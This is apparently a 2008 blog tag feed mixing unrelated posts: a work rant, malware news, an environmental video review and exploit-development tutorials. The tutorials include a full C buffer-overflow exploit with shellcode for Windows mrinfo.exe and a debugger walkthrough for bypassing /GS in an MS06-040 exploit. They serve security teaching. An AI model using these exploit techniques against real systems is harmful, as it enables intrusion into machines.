exploiting « WordPress.com Tag Feed

Why Posting Here Has Sucked Lately

ilyka — Wed, 21 May 2008 10:53:51 +0000

It's my job, basically. It's not my company (my company is quite good as medical transcription businesses go, and that is mostly not intended to be a backhanded compliment, even!) and it's definitely not my supervisor, whom I love. It's the industry in general, which is vanishing in this really slow and painful way like, first we'll just need you to give us your fifth toenail, and you go, "Okay, I can get by without that," and then a few months later it's the first joint on your fifth toe, and you go, "That's going to be a bit tougher, but okay." Except from there it just keeps creeping up your body, and--if I were the type to throw dramatics, I would say "and into your very soul." Wait!--I AM the type to throw dramatics! So, yes.

Dramatics or no dramatics, I don't talk about work as a rule because I get one of two reactions: From the right, I get told to "quit whining." "Quit whining" is the right-wing solution to every problem, except for those problems that require right-wingers themselves to quit whining, like global warming or other people's sexual or reproductive habits. Quit whining!--But if you tell me I can't own two SUVs and boss around all who are other than white/male/het/etc., that is OMG OPPRESSION, and also, WHAT PRICE LIBERTY?!

I am sick of that shit.

From the left, it's "go back to school." "More education" is the left-wing solution to every problem. I'm not even going to start on this--ooh, too late. It's begun.

See, I've been accused more than once of having a chip on my shoulder about academics and, hey, go ahead and fire away at me on that one, but I don't have to stand here feeding you fresh shells while you do it. Let's just say that if you chirp "you need more education!" at me in the mood I'm in right now, it's only going to earn you a foot in your ass.

I don't, by the way, resent academics. I LIKE them. I live with someone who's on that track. What I resent are all the corporate striped shirts who decided that you need a college degree to be an administrative assistant or a bank clerk. Those aren't academics; those are shitheads who figured out that if they can't legally keep people who aren't in their class out of the workplace, they can at least ensure that the workplace is filled with people who are, if not just like them, then aspiring to be just like them. Requiring degrees for jobs that frankly don't need them is just one of the tools of that little trade.

My grandmother retired from a senior position in the accounting department of one of the top advertising firms on Madison Avenue. The company rewarded her with--look, let's just say she did well for herself. It would not be an exaggeration to say she was beloved by the firm. But she worked her way up to that position from mail clerk, and she graduated the eighth grade. CATCH that happening now--and yet if people really believed in class mobility to a fraction of the extent they extol its virtues, that's the sort of thing that would happen all the time.

No. "You must have a degree in order to fetch me Starbucks and schedule my meetings, and oh, p.s., that is all you will ever do around here," is just a way to weed out "not our kind of people" from "our kind of people," by disguising it as an issue of merit. Deep down, everyone knows this, but it's yucky to admit it, because admitting it might mean that you're not so meritorious, either--and who wants to confront a possibility like that? I know I don't. I am too special!

"More education!" Yeah, it's like when I asked this guy once what he did for a living: He said, "I live to learn. I work to make enough money to do that." And of course I immediately thought, "Oh, you pompous ass," but I see his point. I am interested in more education for the purpose of, get this, learning. I am not interested in more education for the purpose of setting some fuckface HR Director's mind at ease that I'm a good worker, I am!--and if I only dress right and speak correctly and graduate from his alma mater and (most critical) keep my mouth shut when the boss ducks out early for a round of golf and/or mistress-boinking, I, too, can be Eliza Doolittle someday.

I am a little burned out on all things employment-oriented right now. Reading imbecility, such as this fine article titled, I'm so not fucking kidding about this, "Ten Reasons Gen Xers Are Unhappy at Work," does not help. Reading that imbecility after reading an article in the same publication about people not having enough money to pave over their dirt floors or install indoor toilets or eat regularly?--I don't even have words.

Well, I have two words: Fuck you:

My job, he explained, would be to assemble data on auto parts the factory produced and send it to somewhere in Mexico. As he started to speed through the details, I interrupted him, asking, "Can I ask you why I'll be doing this? You must already have this data in your database."

He nodded. "That is true," he said. "The reason is so customs can see what's coming in and we can see what's going out."

I interrupted again. "I'm registering this stuff so that it can be made elsewhere? So I'm helping to get all of these people fired?"

He nodded again.

Dude, bonus! You're not just helping to get all of those people fired; you're also helping to exploit all these other people in Mexico! But at least you LEARNED things, amirite? You learned about "the dilemmas and human cost of competing in a global marketplace." Is this the kind of more-education I need? That anyone needs?

As the factory's closing date neared, the number of last-day events—parties is the wrong word—increased. These events weren't catered. Workers made the food themselves and brought it in: salads, rice and beans, fried fish. I could see the solidarity and kindness in the interactions of the people, mostly Hispanic women who had been there for decades.

Toward the end of my stint, I attended a formal lunch for about 70 longtime employees. It included a speech from someone I assumed was in upper management. He sketched the history of the factory. It had been here for 70-odd years. People had told the company it couldn't have a major manufacturing location in New York City—the costs were too high. He told the audience they had proved the naysayers wrong. He told them it was the global costs of labor that had made the closing necessary. He said that a year ago, when the decision to close the factory was announced, a typical business pundit would have said productivity would go down, but it had actually gone up. He told the audience to be proud of this.

I reflected on what he'd said about productivity. If it had gone up, then what were the criteria for sending the factory to Mexico? I saw highly trained, highly experienced people sitting to the right of me. How much would it cost to train workers in Reynosa? How many costly molding devices would be broken? [Those Mexicans, always breaking things! So careless--ed.] Would this closing really help? I thought about the drawbacks of committing to a strategy that means chasing the lowest labor costs around the world.

Then, recent college graduate, please pardon me, but education or no education, you're a damn fool for missing what's right in front of your face: For the people who make these decisions, the people who give you these temp jobs and ask you to kinda-sorta-lie about them, there are no drawbacks to committing to that strategy. You understand?--They don't give a shit. And perhaps you really don't, either, if you're willing to hawk this to Business Week.

And perhaps I do need more education. I need enough more-education to learn not to read fucking Business Week.

[EN] Cross Site Request Forgery

P1t8ull — Thu, 24 Apr 2008 20:55:03 +0000

http://milw0rm.com/papers/159

Il Paper più completo che spiega cosa sono e come sfruttarli :D

Tibet Websites – A Hackers Paradise!

billmullins — Thu, 10 Apr 2008 17:43:43 +0000

Security experts are warning that hackers are exploiting websites about Tibet, inserting malicious code to infect the PCs of unwary surfers.ScanSafe has warned that sites such as FreeTibet.org and SaveTibet.org have been exposed as the world watches the protests currently surrounding the Olympic torch's journey across the world to Beijing.

Visitors to the homepages of these sites are redirected to a site that hosts a Trojan downloader which then attempts to infect the PC.

"Given the world's attention on relations between China and Tibet ahead of the Olympics, it makes sense that these sites would be targeted as web surfers go online to learn more about Tibet and Tibetan independence," said Spencer Parker, director of product management at ScanSafe.

He said that the attack appeared to have been the work of top-level hackers rather than amateur malware authors.

"These websites appear to have been specifically targeted as this is not a generic Trojan downloader. Someone or some group has gone to great trouble to rewrite the exploit and personalize it to the FreeTibet.org and SaveTibet.org websites," Parker said.

Source: Web User (UK)

Share this post :

"Story of Stuff" - Story of exploiting, making, selling, buying and trashing.

Amanda Fong — Fri, 14 Mar 2008 13:59:44 +0000

Sorry for not having written in here for a while! I've been busy doing many things, exams being amongst them. Ai! But I'm back, and this time, with more stuff about the environment.

In my Environmental Ethics class, my teacher showed us a video (Story of Stuff) that was not only very funny but tell us the story of consumerism. Just the humour in the video makes it worth watching! It tells us how much our society are brainwashed to buy, buy, buy, buy and buy more! That isn't truly the problem, because if you're rich and you're able to buy a lot of things, then good for you, right? The problems are found in the exploitation of natural resources to make those things you buy, in the process of making those products and disposing those products afterwards! Us, richer countries, we literally invade Third World countries, steal their resources because we don't have enough anymore and then pollute their lands with factories because we don't want to pollute ours. Other points in the video were made about the products we buy being fabricated with a multitude of extremely dangerous and toxic substances. It makes you doubt whether you'd die one day from the pen you're using or the spoon you're eating from, eh? the video also shows how people in society are stuck in a vicious circle to always work, work, work and then buy, buy, buy. It's so true! It shocks me to learn that we've only been programmed to think this way ever since after World War II when people wanted to make an economic boom. The last part of the video showed viewers that we dispose 99% of what we buy. It's an unconscious waste of money, thus of effort and time! All of our trash then gets burned and buried in the Earth, making our planet die 3 million times faster (okay, I'm exaggerating, but you get the point).

Anyways, enough said. Watch the video, have a great laugh and a good wake-up. It makes you think twice before you buy your next item. I'm not saying to stop going shopping; I know I wouldn't be able to do that! It just...before sliding your credit card, or handing in those purple, green, pink and brown bills, think about if you really REALLY love that item that much, or need it at all.

Tactical Exploitations - The other Way to Pentest

y2h4ck — Tue, 12 Feb 2008 17:36:24 +0000

Encontrei isto e estou lendo, é bem interessante e tem muitos tópicos bacanas, acredito que seja um Must Have para todos os que trabalham com Pentest/Security

Autores : H D Moore (hdm[at]metasploit.com) ; Valsmith valsmith[at]metasploit.com)
Último Update: 08/09/2007

Título : Tactical Exploitation OR "The Other Way to Pen-Test” OR "Random Pwning Fun Bag”

1.1 Abstract
Penetration testing often focuses on individual vulnerabilities and services. This
paper introduces a tactical approach that does not rely on exploiting known
ﬂaws. The ﬁrst section of this paper covers information gathering and discovery
techniques, with a concentration on third-party services and new tools. The
second section of this paper combines the information discovery techniques in
the ﬁrst section with various protocol and implementation weaknesses, in order
to provide clear steps for gaining access to a target network.

Contents
1 Introduction 1.1 Abstract . . . . . . . . . . . . 1.2 Background . . . . . . . . . . 1.3 Author Bio - HD Moore . . . 1.4 Author Bio - Valsmith . . . . 1.5 Acknowledgements . . . . . . 2 The Tactical Approach 2.1 Vulnerabilties . . . . . . . 2.2 Competition . . . . . . . . 3 Information Discovery 3.1 Personnel Discovery . . . . . . . . . . . 3.1.1 Search Engines . . . . . . . . . . 3.1.2 Paterva’s Evolution . . . . . . . 3.2 Network Discovery . . . . . . . . . . . . 3.2.1 Discovery Services . . . . . . . . 3.2.2 Bounce Messages . . . . . . . . . 3.2.3 Virtual Hosting . . . . . . . . . . 3.2.4 Outbound DNS . . . . . . . . . . 3.2.5 Direct Contact . . . . . . . . . . 3.3 Firewalls and IPS . . . . . . . . . . . . . 3.3.1 Firewall Identiﬁcation . . . . . . 3.3.2 IPS Identiﬁcation . . . . . . . . . 3.4 Application Discovery . . . . . . . . . . 3.4.1 Slow and Steady wins the Deface 3.4.2 Finding Web Apps with W3AF . 3.4.3 Metasploit 3 Discovery Modules 3.5 Client Application Discovery . . . . . . 3.5.1 Browser Fingerprinting . . . . . 3.5.2 Mail Client Fingerprinting . . . . 3.5.3 SMB Client Fingerprinting . . . 3.6 Process Discovery . . . . . . . . . . . . . 3.6.1 Traﬃc Monitoring with IP IDs . 3.6.2 Web Site Monitoring with HTTP 3.6.3 Usage Monitoring with MS FTP 4 Information Exploitation 4.1 Introduction . . . . . . . . 4.2 External Networks . . . . . . . . . . . . . . 4.2.1 Attacking File Transfers . . . . . . . 4.2.2 Attacking Mail Services . . . . . . . 4.2.3 Attacking Web Servers . . . . . . . . 4.2.4 Attacking DNS Servers . . . . . . . 4.2.5 Attacking Database Servers . . . . . 4.2.6 Attacking NTLM Authentication . . 4.2.7 Free Hardware . . . . . . . . . . . . 4.3 Internal Networks . . . . . . . . . . . . . . . 4.3.1 Web Proxy Auto-Discovery Protocol 4.3.2 Microsoft DNS Servers . . . . . . . . 4.3.3 Microsoft WINS Servers . . . . . . . 4.3.4 Exploiting NTLM Relays . . . . . . 4.3.5 SMB and Samba . . . . . . . . . . . 4.4 Trust Relationships . . . . . . . . . . . . . . 4.4.1 NFS Home Directories . . . . . . . . 4.4.2 Hijacking SSH . . . . . . . . . . . . 4.4.3 Hijacking Kerberos . . . . . . . . . . 5 Conclusion 3
. . . . . . . . . . . . . . . . . . . . 3
. . . . . . . . . . . . . . . . . . . . 3
. . . . . . . . . . . . . . . . . . . . 4
. . . . . . . . . . . . . . . . . . . . 4
. . . . . . . . . . . . . . . . . . . . 4
5
. . . . . . . . . . . . . . . . . . . . . . 5
. . . . . . . . . . . . . . . . . . . . . . 5
6
. . . . . . . . . . . . . . 6
. . . . . . . . . . . . . . 6
. . . . . . . . . . . . . . 7
. . . . . . . . . . . . . . 8
. . . . . . . . . . . . . . 8
. . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . 10
. . . . . . . . . . . . . . 10
. . . . . . . . . . . . . . 11
. . . . . . . . . . . . . . 11
. . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . 13
. . . . . . . . . . . . . . 13
. . . . . . . . . . . . . . 14
. . . . . . . . . . . . . . 14
. . . . . . . . . . . . . . 15
. . . . . . . . . . . . . . 15
. . . . . . . . . . . . . . 16
. . . . . . . . . . . . . . 16
. . . . . . . . . . . . . . 17
. . . . . . . . . . . . . . 17
19
. . . . . . . . . . . . . . . . . . . . . . 19
. . . . . . . . . . . . 19
. . . . . . . . . . . . 19
. . . . . . . . . . . . 21
. . . . . . . . . . . . 21
. . . . . . . . . . . . 21
. . . . . . . . . . . . 22
. . . . . . . . . . . . 22
. . . . . . . . . . . . 23
. . . . . . . . . . . . 23
. . . . . . . . . . . . 24
. . . . . . . . . . . . 24
. . . . . . . . . . . . 25
. . . . . . . . . . . . 25
. . . . . . . . . . . . 26
. . . . . . . . . . . . 28
. . . . . . . . . . . . 29
. . . . . . . . . . . . 30
. . . . . . . . . . . . 31
34

Aproveitem este livro maravilhoso escrito por quem realmente entende da coisa =]
http://packetstorm.offensive-security.com/papers/attack/tactical_paper.pdf

Hackers Maybe Exploiting WordPress Themes?

Sakib — Tue, 27 Nov 2007 15:25:01 +0000

On 26th november, Alistair Croll did a post on GIGAOM - Are Hackers Exploiting WordPress Themes?

On the other hand, Punsalan has a write-up did one post Do not download WordPress themes distributed by 3rd party sites

Don't download any theme from this site wpsphere

Now the day is coming to think about it and always we should aware about that kinds of hacking.

Hackers Maybe Exploiting WordPress Themes?

Sakib — Tue, 27 Nov 2007 15:25:01 +0000

On 26th november, Alistair Croll did a post on GIGAOM - Are Hackers Exploiting WordPress Themes?

On the other hand, Punsalan has a write-up did one post Do not download WordPress themes distributed by 3rd party sites

Don't download any theme from this site wpsphere

Now the day is coming to think about it and always we should aware about that kinds of hacking.

Exploiting Windows NT 4 Buffer Overruns

hessamx — Thu, 15 Mar 2007 07:36:40 +0000

This paper show how to exploiting buffer overruns on windows nt 4.
"This document is for educational purposes only and explains what a
buffer overrun is and shows how they can be exploited on the Windows
NT 4 operating system using RASMAN.EXE as a case study. We will take a
look at Windows NT processes, virtual address space, the dynamics of a
buffer overrun and cover certain key issues such as explaining what a
stack is and what the ESP, EBP and EIP CPU registers are and do. With
these covered we'll look into the buffer overrun found in RASMAN.EXE.
This document may be freely copied and distributed only in its
entirety and if credit is given."
View this paper .

win32 Buffer Overflow

hessamx — Thu, 08 Feb 2007 11:49:47 +0000

Real Life Vuln-Dev Process of a Win32 Stack Buffer Overflow
Introduction from the paper:
Many times Sergio has been asked for writing a paper about how to code an exploit for win32, for two reasons, first because there are many papers about exploitation on *nix, but few about how to exploit on win32 world, and second because papers about win32 exploitation get very difficult to be understood by people without a good understanding of ASM, C languages. So Sergio thought that the best way to do something clear he had to write something as simple as possible, without leaving nothing to guess by the readers. Well this is what Sergio think is the easiest that he could do. And explaining the hole process of finding, debugging and exploiting a black box application. For this purpose Sergio has chosen 'War-FTPd v1.65' a known stack b0f bugged software, which is gonna be used in this tutorial.

view this paper on packetstorm security (pdf format)

Windows Vista Exploit !

hessamx — Wed, 03 Jan 2007 17:52:20 +0000

A Microsoft Windows Vista exploit has surfaced on a Russian website. From what it looks like, this is a privilege escalation vulnerability within csrss.exe which is the main executable for the Microsoft Client and Server runtime. This flaw is locally exploitable only, and affects all versions of Windows.
Source : Security-protocols.com

Writing exploit BoF on Windows

hessamx — Mon, 25 Dec 2006 12:28:16 +0000

This is a tutorial about writing exploit. We will use Mrinfo.exe Buffer for learning. nice paper for noobs . step by step with pictures . source : coromputer.net (read more ...) Tools : - Debugger, we use OllyDbg but any others will be ok. - WinHex - Compiler ################################################################## For beginning, we have to find informations about hole that we will want exploit. There, we will use a simple hole in Mrinfo. The first thing to do is to find how create the buffer overflow on the computer. For this, the most of time, we have to find the advisory on k-otik or packetstormsecurity for example. In our case, we can read into the advisory "Mrinfo.exe is a tool used for Routing Multicast. There is a buffer overflow hole in Mrinfo.exe, the bug seems to be a bad handling of "-i" and "-n" settings that badly manage the values superior of 53 characters." We have to start mrinfo.exe with -1 [53 char] (sure, without these "[]"), for reproducing the bug. So, we reproduced the bug, but we don't know if we can be able to do something with that. For knowing, we will check is we can crush EIP or not. I will show you how doing that with OllyDbg but we can do that with Visual Studio. First, we have to choose which program we will debug, there, sure, we will use mrinfo.exe. File -> Open or F3, we go in system32 repertory and set -i [60A] for argument a little bit over the buffer into the advisory because our goal is to crash the program but too to crush EIP. The program is starting but not execute. At this time, we have to press F9 (or blue arrow in tools bar). So, EIP is on 41414141 (41 = Hexa value for A in Ascii) but we can also see a part of our buffer directly into ESP. Our next goal is to learn the exact position of the characters that we will crush EIP and for that the only thing that we can do is to try. So, we start we something like mrinfo.exe -i [55A][10B] (Sure, always into the debugger). EIP select 42424242 (BBBB). Our RET will be situate between the characters 55 and 65. We will try mrinfo.exe -i [55A]ZZZZ[6B] and there, EIP select 425A5A5A (BZZZ). There is a B of too into the buffer, The characters of RET are 57 58 59 and 60. At this time, we know that our buffer will be like [56A][RET]... We have to find the place into the beginning of our shellcode and we will finally have the complete structure of our buffer. There, that will be not too hard, we will use a technic that we will also use to find the position of the RET. So, for that, we will start mrinfo.exe with -i [56A][ZZZZ][BCDEFGHIJKLMNOPQRSTUVWXY] for setting. In our case, we have chance, ESP select after our RET but it isn't always the case, if we have enough place, we can also drop this step and simply add NOP into our buffer just after the RET and before the shellcode. Now, we know how crash the program and that can be easily set our shellcode into ESP, we also know the position of our RET and of the shellcode into the buffer. It's time to code ! What our exploit will have to do ? We will have to create a buffer with our shellcode and our RET. Next, we will have to execute mrinfo with -i and our buffer for setting, for do that we will create a buffer with sprintf() and execute it with system(). And our buffer ? We will have to have a RET and a shellcode, we will begin with RET. Previously, we saw that our shellcode can be added to ESP. So, to create a exploit the best is to do select EIP on a JMP ESP or a CALL ESP. Like you surely know, our RET is into the center of our buffer, that can't contain NULL 0x00 characters. We just have to find our JMP ESP at another adress that will be not like 00XXXXXX. We will use WinHex for read the RAM. So, Start mrinfo.exe with the debugger and after into WinHex, open the RAM or mrinfo Tolls->RAM editor and select mrinfo and open entire memory. Unfortunately, the adresses there is like 00XXXXXX we cannot search a JMP ESP there. Always into Tools-> RAM editor we see that mrinfo run lot of dll like systems dll that they are sometime adresses like 77XXXXXX that will be good for we. So, open msvctr.dll for example. Into Msvctr.dll the adresses are like 77XXXXXX, now we have to check if it have a JMP ESP in. The OP codes a JMP ESP are 0xff 0xe4. We will search into Msvcrt.dll with WinHex Search->Find Hex Value and search FFE4, unfortunately there isn't in Msvcrt.dll we can search FFD4 (CALL ESP) but we will check into another dll ntdll.dll for example and research another time. Oh ! We have a JMP ESP in ntdll.dll at offset 77F4801C, unfortunately this offset can change of a version to another of Windows and the service pack, but our exploit is local ! We can ask directly our program to find this offset! For that it just have to make a offset = LoadLibrary("ntdll.dll") to load the dll. And after we will scan our dll with a loop while(!end) { if((( BYTE *)offset)[i] == ff && (( BYTE *)offset)[i+1] == e4) { sprintf(ret,"%x",&(( BYTE *)offset)[i]); end= TRUE; } i++; } This loop will search FF and E4 (OP code of JMP ESP) into the library and set this offset into RET. But we can't set this offset directly like that into our var because we have get it on 8 char and we have to set it to 4 char .. for(y=0;y<10;y++) { nret[y]=ret[y]-48; if(nret[y]>10){ switch((nret[y]-33)) { case 16: nret[y]=0x0a; break; case 17: nret[y]=0x0b; break; case 18: nret[y]=0x0c; break; case 19: nret[y]=0x0d; break; case 20: nret[y]=0x0e; break; case 21: nret[y]=0x0f; break; } } memset(ret,0,sizeof(ret)); ret[0]=nret[0]*0x10+nret[1]; ret[1]=nret[2]*0x10+nret[3]; ret[2]=nret[4]*0x10+nret[5]; ret[3]=nret[6]*0x10+nret[7]; So the question of RET is answered. shellcode is left, for our example we will use a little simple shellcode that popup a MessageBox. char shellcode[]= "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x33xc9" "x51" "x51" "x51" "x51" "xb8xd7xadxd3x77" "xffxd0" "xffx57xe8"; There are some NOP before to make it more portable in the case or ESP would not point on the beginning of the shellcode but a few bytes further. Now make the buffer that it will send to system(). It have to resemble like « mrinfo.exe -i [56A][RET][SC] » So : sprintf(buffer,"mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",ret[3],ret[2],ret[1],ret[0],shellcode); give it to system() system(buffer); That's it, now our exploit , it will be able to work Win2k :) On WinXP, There is a access violation, but it isn't important because our only goal was to write a exploit. When mrinfo.exe crash (on winxp) made debogage and choose continuous. And ! ! ! This is our Message box of our shellcode, mrinfo.exe have execute our code. ################################################################## This tutorial is the image of that which wrote it, imperfect, So don't hesitate to contact me if you note an error or if you have a comment to make at scurt@coromputer.net You will be able to find a version improved of the exploit with a SC which pop Shell on our site. http://www.coromputer.net/files/mrinfo2k.c Special thanks to Coromputer team and special greet to Decryptus, Mik_ and kralor without which nothing could have been possible. Find us on www.coromputer.net or on irc #coromputer @ undernet ################################################################## // The full code used into this text : #include "windows.h" #include "conio.h" int main() { int offset; BYTE ff = 0xff; BYTE e4 = 0xe4; BOOL end = FALSE; char ret[10]={0}; int nret[10]={0}; int i=0; int y=0; char buffer[128]; char shellcode[]= "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x33xc9" "x51" "x51" "x51" "x51" "xb8xd7xadxd3x77" "xffxd0" "xffx57xe8"; // this shellcode just popup a new blank MessageBox 33char //56 char before the ret char* pshellcode; offset=(int)LoadLibrary("ntdll.dll"); while(!end) { if((( BYTE *)offset)[i] == ff && (( BYTE *)offset)[i+1] == e4) { printf("%xn",&(( BYTE *)offset)[i]); sprintf(ret,"%x",&(( BYTE *)offset)[i]); end= TRUE; } i++; } for(y=0;y<10;y++) { nret[y]=ret[y]-48; if(nret[y]>10){ switch((nret[y]-33)) { case 16: nret[y]=0x0a; break; case 17: nret[y]=0x0b; break; case 18: nret[y]=0x0c; break; case 19: nret[y]=0x0d; break; case 20: nret[y]=0x0e; break; case 21: nret[y]=0x0f; break; } } } memset(ret,0,sizeof(ret)); ret[0]=nret[0]*0x10+nret[1]; ret[1]=nret[2]*0x10+nret[3]; ret[2]=nret[4]*0x10+nret[5]; ret[3]=nret[6]*0x10+nret[7]; sprintf(buffer,"mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",ret[3],ret[2],ret[1],ret[0],shellcode); system(buffer); getch(); return 0; } Source : coromputer.net

develop MS06-040 Exploit !

hessamx — Sat, 16 Dec 2006 13:10:44 +0000

in this paper Trirat Kira explain how to develop exploit MS06-040 that attack against Windows Server 2003 SP0, especially how to break the stack-based buffer overflow protection mechanism in Windows Server 2003 SP0.
read more ...

First of all, I use the metasploit module, netapi_ms06_040.pm, as a template to study how the system process crash. I use the target number 2 “(wcscpy) Windows XP SP0/SP1” and modify the code like this:

[ ‘(wcscpy) Windows XP SP0/SP1’, 612, 0x00020804 ],

change to

[ ‘(wcscpy) Windows XP SP0/SP1’, 612, 0xaaaaaaaa ],

add this code:

$shellcode = “\x42” x length($shellcode);

above the code line:

my $path

replace the code:

Pex::Text::AlphaNumText(number)

with

(“\x41” x number)

The reason why I have to do this change is I have to know which parts of payload overwrite which registers and how the stack look likes. I run this exploit attack against the machine, and windbg show the result like this:

kd> .exr 00E0F1F8

ExceptionAddress: 77bd4d33 (msvcrt!wcscpy+0x0000000b)

ExceptionCode: c0000005 (Access violation)

ExceptionFlags: 00000000

NumberParameters: 2

Parameter[0]: 00000001

Parameter[1]: 41414141

Attempt to write to address 41414141

kd> .cxr 00E0F214

eax=00e0d8d2 ebx=77bd4cfe ecx=41414141 edx=00e0f4f8 esi=00000000 edi=77bd4e32

eip=77bd4d33 esp=00e0f4e0 ebp=00e0f910 iopl=0 nv up ei ng nz na po cy

cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000283

msvcrt!wcscpy+0xb:

001b:77bd4d33 668901 mov word ptr [ecx],ax ds:0023:41414141=????

The exception occurs at the address 0x77bd4d33 (wcscpy+0xb) – attemp to write to the address 0x41414141. I also view the stack:

kd> dd esp

00e0f4e0 71c44b7e 41414141 00e0f4f8 00000000

00e0f4f0 0016ded8 0011d878 0100d8d2 77da7417

00e0f500 42421000 42424242 42424242 42424242

00e0f510 42424242 42424242 42424242 42424242

00e0f520 42424242 42424242 42424242 42424242

00e0f530 42424242 42424242 42424242 42424242

00e0f540 42424242 42424242 42424242 42424242

00e0f550 42424242 42424242 42424242 42424242

kd> dd ebp

00e0f910 41414141 41414141 41414141 aaaaaaaa

00e0f920 41414141 41414141 aaaaaaaa 41414141

00e0f930 41414141 41414141 41414141 41414141

00e0f940 41414141 41414141 41414141 00000000

00e0f950 0011d87c 00000000 00e0f988 77c52360

00e0f960 0011d590 0011d5a0 0016ded8 00000061

00e0f970 0011d878 0011d87c 00000000 02020202

00e0f980 00000007 000efc9c 00e0fd64 77ce51d0

kd> kb

ChildEBP RetAddr Args to Child

00e0f4dc 71c44b7e 41414141 00e0f4f8 00000000 msvcrt!wcscpy+0xb

00e0f958 77c52360 0011d590 0011d5a0 0016ded8 NETAPI32!CanonicalizePathName+0x12c

Now the address 0x41414141 is overwritten instead of 0xaaaaaaaa. I found that the offset of the position that can control ecx is at 46th bytes from the last of variable $path.
At this time I can control ecx, I change value 0xaaaaaaaa back to 0x02040801 (near the location 0x02080400) and rerun the exploit

kd> r

eax=00e84242 ebx=77bd4cfe ecx=02080401 edx=00e8f4f8 esi=00000000 edi=77bd4e32

eip=77bd4d33 esp=00e8f4e0 ebp=00e8f910 iopl=0 nv up ei ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000287

001b:77bd4d33 668901 mov word ptr [ecx],ax ds:0023:02080401=????

kd> u

001b:77bd4d33 668901 mov word ptr [ecx],ax

001b:77bd4d36 41 inc ecx

001b:77bd4d37 41 inc ecx

001b:77bd4d38 42 inc edx

001b:77bd4d39 42 inc edx

001b:77bd4d3a 6685c0 test ax,ax

001b:77bd4d3d 75f1 jne 77bd4d30

001b:77bd4d3f 8b442404 mov eax,dword ptr [esp+4]

kd> p

ntdll!KiUserExceptionDispatcher+0x4:

001b:77f4526b 8b1c24 mov ebx,dword ptr [esp]

After the instruction at the address 0x77bd4dee “mov word ptr [ecx], ax”, the function KiUserExceptionDispatcher() is called instead of the instruction at address 0x77bd4d36 “inc ecx”. This means that the address 0x02080401 is not writeable.

This is the new problem when developing this exploit. 0x02080401 is not writeable no more. There is any location that I can overwrite and it has to be reliable. One of the best choice is heap memory. I decide to use the memory address 0x01590101 as the memory to be overwritten.

kd> bl

0 e 77bd4d33 0001 (0001) "j @ecx = 01590101 '';'gc'"

kd> g

001b:77bd4d33 668901 mov word ptr [ecx],ax

kd> r

eax=00e8d8eb ebx=77bd4cfe ecx=01590101 edx=00e8f4f8 esi=00000000 edi=77bd4e32

eip=77bd4d33 esp=00e8f4e0 ebp=00e8f910 iopl=0 nv up ei ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000287

001b:77bd4d33 668901 mov word ptr [ecx],ax ds:0023:01590101=0000

kd> u

001b:77bd4d33 668901 mov word ptr [ecx],ax

001b:77bd4d36 41 inc ecx

001b:77bd4d37 41 inc ecx

001b:77bd4d38 42 inc edx

001b:77bd4d39 42 inc edx

001b:77bd4d3a 6685c0 test ax,ax

001b:77bd4d3d 75f1 jne 77bd4d30

001b:77bd4d3f 8b442404 mov eax,dword ptr [esp+4]

kd> p

001b:77bd4d36 41 inc ecx

Yeah, 0x01590101 is writeable memory. Everything seems OK, it return from msvcrt!wcscpy() to NETAPI32!CanonicalizePathName().

msvcrt!wcscpy+0x1b:

001b:77bd4d43 c3 ret

kd> p

NETAPI32!CanonicalizePathName+0x12c:

001b:71c44b7e 59 pop ecx

kd> u

NETAPI32!CanonicalizePathName+0x12c:

001b:71c44b7e 59 pop ecx

001b:71c44b7f 59 pop ecx

001b:71c44b80 33c0 xor eax,eax

001b:71c44b82 8b4dfc mov ecx,dword ptr [ebp-4]

001b:71c44b85 5f pop edi

001b:71c44b86 5e pop esi

001b:71c44b87 5b pop ebx

001b:71c44b88 e869c9ffff call NETAPI32!__security_check_cookie (71c414f6)

001b:71c44b8d c9 leave

001b:71c44b8e c21400 ret 14h

Set of instructions are executed like I describe in the previous post, except this line:
NETAPI32!CanonicalizePathName+0x136:

001b:71c44b88 e869c9ffff call NETAPI32!__security_check_cookie (71c414f6)

When this function is called, everything is disappear. The instruction “leave” at the address 0x71c44b8d is not called. As its name imply, this is the stack-based buffer overflow protection is Windows Server 2003 SP0. The function looks like this:

kd> u 71c414f6

NETAPI32!__security_check_cookie:

71c414f6 3b0decc1c871 cmp ecx,dword ptr [NETAPI32!__security_cookie (71c8c1ec)]

71c414fc 0f8593060100 jne NETAPI32!__security_check_cookie+0x9 (71c51b95)

71c41502 c3 ret

This function will compare ecx value with the value that stored at 0x71c8c1ec – random cookie. The ecx value comes from the instruction at address 0x71c44b82 “mov ecx, dword ptr [ebp-4]” – the cookie that stored on the stack to cross check with the valid one. If ecx value match the valid cookie, the flow of execution will continue, if not it will jump to the address 0x71c51b95:

NETAPI32!__security_check_cookie+0x9:

71c51b95 e97d4e0000 jmp NETAPI32!__report_gsfailure (71c56a17)

it jumps to function NETAPI32!__report_gsfailure(). End up this !!!

Now, I’m faced with /GS --“. At first time I think may be I should give up at this point because there is no one can break /GS, except one that described by David Litchfield - http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf. Litchfield’s technique use SEH to bypass the protection. But as I know, (may be) there is no part of our payload overwrite the handler so this technique cannot be used.

But something comes into my mind. At this point I have the following condition that true:

I can write to any memory location that I want – Sure, it has to be writable memory location (1)
I can modified the ecx value – cookie stored on stack (2)
Then I think if I can control both cookies on stacked and the valid cookie, I can pass the security cookie check function and execute “leave” and “ret” instruction. To control both cookies, these conditions have to be true:
I can write to the address that store the valid cookie. This address has to be writeable and is a fixed address – for a reliable exploit (3)
I can control ecx value (4)
Because the condition (2) is true, the condition (4) is also true because they are equivalent. For the condition (3), it will be true if the address that store the valid cookie, 0x71c8c1ec, is writable and is a fixed location.
